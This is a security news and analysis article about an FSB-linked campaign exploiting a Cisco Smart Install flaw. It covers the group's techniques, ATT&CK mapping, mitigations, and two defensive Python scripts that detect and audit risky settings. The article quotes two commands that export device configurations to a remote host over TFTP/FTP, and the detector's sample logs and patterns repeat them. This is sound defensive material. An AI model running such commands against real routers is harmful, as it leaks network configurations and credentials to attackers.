Why Old Cisco Bugs Are Fueling New Espionage Campaigns
“Static Tundra,” tied to Russia’s FSB Center 16, is abusing a 2018 Cisco Smart Install bug to loot configs and plant router implants across critical infrastructure, Cisco Talos and the FBI warn. Patch or disable SMI now.
The FBI and Cisco Talos warned that an FSB-linked group dubbed Static Tundra is exploiting CVE-2018-0171 in Cisco IOS/IOS XE Smart Install to compromise unpatched and end-of-life devices. Targets span telecom, higher education and manufacturing, with activity focused on configuration theft, long-term persistence and reconnaissance against U.S. critical infrastructure and allied networks.
WASHINGTON — Aug. 20, 2025. The FBI is urging organizations to immediately secure unpatched Cisco networking gear after identifying a year-long cyber-espionage campaign by Static Tundra, a group linked to Russia’s FSB Center 16, that is exploiting a seven-year-old Cisco Smart Install flaw to gain and maintain access to critical networks.
What Happened
Cisco Talos says Static Tundra is compromising unpatched and often end-of-life Cisco devices by abusing CVE-2018-0171 (Smart Install) and then using SNMP and custom tooling to quietly siphon device configurations and persist for years. Victims include organizations in telecom, higher education and manufacturing across North America, Europe, Asia and Africa.
“The purpose of this campaign is to compromise and extract device configuration information en masse,” Cisco Talos wrote.
The FBI’s public advisory notes the actors collected configuration files for thousands of networking devices tied to U.S. critical infrastructure and, in some cases, modified configs to enable unauthorized access.
Who Is “Static Tundra”
Talos assesses Static Tundra as a sub-cluster of Energetic/Berserk Bear, historically linked to FSB Center 16. The current campaign escalated alongside Russia’s war on Ukraine, with strategic targeting of Ukraine and allied countries.
Technical Analysis: How the Intrusion Works
Initial Access
- Exploits CVE-2018-0171 in Cisco Smart Install (TCP 4786), which allows device reloads or arbitrary code execution. A patch was released in 2018, but many devices remain unpatched and some are end-of-life.
Execution & Lateral Operations
- Leverages SNMP (often v1/v2 with weak or guessed community strings) to change running configs, create local users or enable legacy services (e.g., TELNET).
- Redirects traffic of interest via GRE tunnels and harvests NetFlow data for its intelligence value.
Persistence & Defense Evasion
- Deploys the historical SYNful Knock router implant (2015) for firmware-level persistence; access triggered by a “magic” TCP SYN packet.
- Modifies TACACS+ configuration and ACLs to impair logging and restrict access for stealth.
Data Collection & Exfiltration
- Bulk exfiltration of startup/running configs using TFTP/FTP and CISCO-CONFIG-COPY-MIB, e.g.:
do show running-config | redirect tftp://<ip>/conf_bckp
copy running-config ftp://user:pass@<ip>/output.txt
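As an added illustration (not code from Talos or the FBI), the following Python flags the two cleartext config-export patterns shown above, plus read-write SNMP community changes, in TACACS+ command-accounting records; the log lines and their field layout are constructed for the example.

```python
import re

# Constructed sample TACACS+ command-accounting records (not real logs). The two
# exfil commands mirror the TFTP-redirect and FTP-copy patterns quoted above.
SAMPLE_ACCOUNTING = """\
Aug 20 10:01:02 10.0.0.5 netops tty2 10.0.0.50 stop service=shell priv-lvl=15 cmd=show version
Aug 20 10:03:11 10.0.0.5 netops tty2 10.0.0.50 stop service=shell priv-lvl=15 cmd=copy running-config ftp://user:pass@203.0.113.7/output.txt
Aug 20 10:04:40 10.0.0.5 svc_backup tty3 198.51.100.9 stop service=shell priv-lvl=15 cmd=do show running-config | redirect tftp://198.51.100.9/conf_bckp
Aug 20 10:05:05 10.0.0.5 netops tty2 10.0.0.50 stop service=shell priv-lvl=15 cmd=copy running-config startup-config
Aug 20 10:07:19 10.0.0.5 netops tty2 10.0.0.50 stop service=shell priv-lvl=15 cmd=snmp-server community public RW
"""

# Running/startup config leaving the device over cleartext file transfer.
EXFIL_RE = re.compile(
    r"(?:copy\s+(?:running|startup)-config\s+(?:tftp|ftp)://"
    r"|show\s+(?:running|startup)-config\s*\|\s*redirect\s+(?:tftp|ftp)://)",
    re.IGNORECASE,
)
# A read-write SNMP community being (re)configured from the CLI.
SNMP_RW_RE = re.compile(r"snmp-server\s+community\s+\S+\s+RW\b", re.IGNORECASE)
# Field layout assumed for the constructed records: ts device user tty src ... cmd=...
RECORD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]+)\s+(?P<device>\S+)\s+(?P<user>\S+)\s+\S+\s+"
    r"(?P<src>\S+)\s+.*?cmd=(?P<cmd>.*)$"
)


def find_suspicious_commands(log_text):
    """Return (ts, device, user, src_ip, reason, cmd) for each matching record."""
    hits = []
    for line in log_text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # skip records that do not carry a cmd= field
        cmd = m.group("cmd").strip()
        reason = None
        if EXFIL_RE.search(cmd):
            reason = "config-exfil-cleartext"
        elif SNMP_RW_RE.search(cmd):
            reason = "snmp-rw-community-set"
        if reason:
            hits.append((m.group("ts"), m.group("device"), m.group("user"),
                         m.group("src"), reason, cmd))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_commands(SAMPLE_ACCOUNTING):
        print(" | ".join(hit))
```

Routine `copy running-config startup-config` saves are deliberately not flagged, so the rule stays quiet on normal operator activity.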
Approximate MITRE ATT&CK Mapping (Enterprise)
- T1190 Exploit Public-Facing Application (Smart Install exposure)
- T1078 Valid Accounts (compromised/weak SNMP strings)
- T1601 Modify System Image (SYNful Knock firmware implant)
- T1048.003 Exfiltration Over Unencrypted/Non-C2 Protocol (TFTP/FTP)
- T1562 Impair Defenses (logging/TACACS+ changes)
(Mappings inferred from Talos/FBI behaviors.)
Impact & Response
Affected Systems/Users: Unpatched or EoL Cisco IOS/IOS XE devices with Smart Install enabled—commonly older Catalyst and some Nexus models—used inside critical infrastructure, universities and manufacturers. The FBI observed thousands of U.S.-connected devices impacted.
Immediate Actions Recommended:
- Patch to a fixed IOS/IOS XE release or disable Smart Install (“no vstack”) if patching isn’t possible.
- Retire/replace EoL gear; enforce SNMPv3, rotate community strings, disable TELNET, and lock down TACACS+.
- Hunt for SYNful Knock indicators and unusual config changes; validate AAA/logging pipelines.
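The following Python is an added example, not a Cisco or Talos tool: it audits a running-config text for the items in the list above (Smart Install still enabled, SNMPv1/v2c communities, TELNET on vty lines, GRE tunnels, missing command accounting). The sample config is constructed, and treating Smart Install as enabled unless an explicit “no vstack” line is present is an assumption of the example.

```python
import re

# Constructed sample running-config (not a real device) showing the weak settings
# the advisory calls out; note there is no "no vstack" line.
SAMPLE_CONFIG = """\
hostname edge-sw-01
snmp-server community public RO
snmp-server community c1sc0 RW
aaa new-model
tacacs server ISE
 address ipv4 10.0.0.20
interface Tunnel7
 tunnel source GigabitEthernet0/1
 tunnel destination 203.0.113.44
 tunnel mode gre ip
line vty 0 4
 transport input telnet ssh
"""


def audit_ios_config(config_text):
    """Return a list of (check, detail) findings for the hardening gaps above."""
    lines = [ln.rstrip() for ln in config_text.splitlines()]
    findings = []
    # Assumption: Smart Install is on unless an explicit "no vstack" line is
    # present, so its absence is the finding.
    if "no vstack" not in lines:
        findings.append(("smart-install", "no 'no vstack' line; disable Smart Install or patch CVE-2018-0171"))
    for ln in lines:
        m = re.match(r"snmp-server community (\S+)\s+(RO|RW)\b", ln)
        if m:
            findings.append(("snmp-v1v2c", f"community '{m.group(1)}' has {m.group(2)} access; move to SNMPv3"))
    # Walk indented blocks to find GRE tunnels and TELNET on the vty lines.
    block = ""
    for ln in lines:
        if not ln.startswith(" "):
            block = ln
            continue
        body = ln.strip()
        if block.startswith("interface Tunnel") and body.startswith("tunnel mode gre"):
            findings.append(("gre-tunnel", f"{block}: GRE tunnel present; confirm it is expected"))
        if block.startswith("line vty") and body.startswith("transport input"):
            allowed = body.split()[2:]
            if "telnet" in allowed or "all" in allowed:
                findings.append(("telnet", f"{block}: '{body}' permits TELNET; use 'transport input ssh'"))
    if not any(ln.startswith("aaa accounting commands") for ln in lines):
        findings.append(("aaa-accounting", "no 'aaa accounting commands'; command logging to TACACS+ is off"))
    return findings


if __name__ == "__main__":
    for check, detail in audit_ios_config(SAMPLE_CONFIG):
        print(f"[{check}] {detail}")
```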
Potential Legal/Regulatory Fallout: Owners/operators of covered critical infrastructure may face enhanced scrutiny under sector risk-management agency guidance and incident-reporting obligations if unauthorized access or data exfiltration is confirmed. (General regulatory context; check sector-specific rules.)
The Smart Install bug (CVE-2018-0171) has been repeatedly abused since disclosure, and other states (e.g., China’s Salt Typhoon) have also targeted Cisco routers—underscoring the long tail of unpatched edge devices.
Reuters and other outlets reported that the FBI/Cisco warnings highlight Center 16 activity and the strategic value of router footholds for long-term espionage.
FBI (IC3 PSA): Russian FSB actors are “exploiting … an unpatched vulnerability (CVE-2018-0171) in Cisco Smart Install” to target U.S. and global entities.
Cisco Talos: “Static Tundra is linked to the FSB’s Center 16 and targets unpatched, often end-of-life devices for long-term intelligence gathering.”
El Mostafa Ouchen, cybersecurity author and analyst: “Treat aging routers like unmonitored servers at the perimeter—if you can’t patch, decommission. Assume configs are loot and monitor for silent changes.”
What Comes Next
Expect continued scanning of exposed SMI endpoints, copy-cat operations by other states, and stepped-up pressure on operators to replace EoL gear and harden network devices with the same rigor applied to servers and endpoints.
Fast Facts (for editors)
- Threat actor/malware: Static Tundra (FSB Center 16 sub-cluster; Energetic/Berserk Bear lineage); historic SYNful Knock implant.
- CVE: CVE-2018-0171 (Cisco Smart Install).
- Sectors hit: Telecom, higher education, manufacturing; focus on U.S. critical infrastructure and allies.
Sources:
Cisco Talos blog on Static Tundra; FBI IC3 Public Service Announcement (Aug. 20, 2025); Cisco CVE-2018-0171 advisory/NVD; Reuters and trade press coverage.